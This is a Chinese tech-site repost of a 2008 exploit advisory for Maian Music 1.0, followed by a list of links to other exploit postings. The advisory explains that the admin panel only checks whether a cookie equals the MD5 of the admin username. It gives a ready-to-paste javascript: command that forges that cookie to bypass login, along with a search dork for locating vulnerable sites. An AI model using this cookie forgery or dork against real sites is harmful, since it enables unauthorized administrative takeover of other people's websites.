首页网页制作网络编程脚本专栏数据库网站运营网络安全平面设计 CMS教程

Maian Music 1.0 Insecure Cookie Handling Vulnerability

所属分类：网络安全 / Exploit 阅读数： 98

收藏 0赞 0分享

Author: Saime
Date: July 12, 2008
Script: Maian Music v1.0 Insecure Cookie Handling Vulnerability
URL: http://www.maianscriptworld.co.uk
Dork: Maian Music v1.0. Copyright © 2007-2008 Maian Script World. All Rights Reserved.

Description:
Maian Music v1.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mmusic_cookie,
equals admin username.(md5)

Exploit:
javascript:document.cookie = "mmusic_cookie=21232f297a57a5a743894a0e4a801fc3; path=/php/demos/music/admin/"

Note:
The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin

更多精彩内容其他人还在看

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

|___________________________________________________| | |AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability |

收藏 0赞 0分享

PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit

#!/usr/bin/perl #inphex #PHPizabi v0.848b C1 HFP1 Remote Code Execution #http://www.dz-secure.com/tools/1/WebESploit.pl.txt #if you

收藏 0赞 0分享

PhotoPost vBGallery 2.4.2 Arbitrary File Upload Vulnerability

vBulletin PhotoPost vBGallery v2.x Remote File Upload Found by : Cold z3ro e-mail : exploiter@hackteach.org Home page : www.H

收藏 0赞 0分享

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

############################################################### #################### Viva IslaM Viva IslaM #################### ## ##

收藏 0赞 0分享

Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

############################################################################################ #

收藏 0赞 0分享

php Help Agent

##################################################### # Author : BeyazKurt # Contact : Djm-sut@Hotmail.Com # # Script : php Help

收藏 0赞 0分享

Comdev Web Blogger

____________________ ___ ___ ________ _ _____/_ ___ / | \_____ | __)_ / // ~ / | | \

收藏 0赞 0分享

Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

<< In The Name Of GOD >> -------------------------------------------------------------

收藏 0赞 0分享

Galatolo Web Manager 1.3a

--== ============================================================================ ==-- --== Galatolo Web Manager 1.3a <= XSS / Remo

收藏 0赞 0分享

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

==================================================== | pSys v0.7.0 Alpha Multiple Remote File Include | (works only with

收藏 0赞 0分享

查看更多

网络赚钱

更多

站长故事

更多

建站极客

合作伙伴

在线工具

网站地图

建站极客移动版

聚合全网技术文章，根据你的阅读喜好进行个性推荐

© 2012 - 2020 zhanzhang360.cn Some Rights Reserved.

沪ICP备13040166号-22